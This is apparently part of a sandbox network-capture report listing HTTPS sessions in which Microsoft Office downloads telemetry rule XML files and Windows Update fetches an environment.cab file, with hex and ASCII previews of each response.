2024-12-08 12:32:05 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	49880	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:05 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:05 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 15e9867f-c01e-0046-5804-482db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123205Z-r1cf579d778mvsklhC1EWRkavg00000005gg000000005rf6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:05 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:05 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:06 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: deed8991-301e-0033-2005-48fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123206Z-r1cf579d778w59f9hC1EWRze6w00000005k000000000477m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:06 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:06 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:07 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:06 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 123741ec-101e-008d-5b05-4892e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123206Z-r1cf579d778bb9vvhC1EWRs95400000004v000000000571e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:07 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:07 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:07 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 4763d432-801e-00ac-0c1e-49fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123207Z-r1cf579d778dndrdhC1EWR4b24000000051g0000000021fe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:08 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:07 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:07 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 12837f39-c01e-008e-2e0d-497381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123207Z-r1cf579d7789trgthC1EWRkkfc000000061g000000002n5v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:08 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:07 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:07 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: a762f06e-601e-0084-7004-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123207Z-r1cf579d778z4wflhC1EWRa3h000000005dg000000002rqw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:08 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.6	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:07 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:08 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 2d97fd60-e01e-000c-7b06-488e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123208Z-r1cf579d778qlpkrhC1EWRpfc8000000061g000000002mvk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:08 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.6	49887	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:08 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F6mZw79N1evM2Hy&MD=+abDNPzz HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-08 12:32:08 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 7f1d49d5-4d6a-47f1-85b6-29c7ceaa2213 MS-RequestId: a193f6a1-e232-4111-a678-01ded1824ccd MS-CV: F4fkGaI4p0mC4RLG.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 08 Dec 2024 12:32:08 GMT Connection: close Content-Length: 30005
2024-12-08 12:32:08 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-12-08 12:32:09 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:08 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:09 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: c22706de-601e-00ab-7503-4866f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123209Z-r1cf579d778dfdgnhC1EWRd3w00000000580000000000tbr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:09 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:09 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:10 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:10 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 22947e51-b01e-0021-7203-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123210Z-r1cf579d778v97q7hC1EWRf95c00000004z0000000004gk0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:10 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	49890	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:09 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:10 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:10 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 1f576be4-501e-008f-5405-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123210Z-r1cf579d778lntp7hC1EWR9gg400000004w000000000185r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
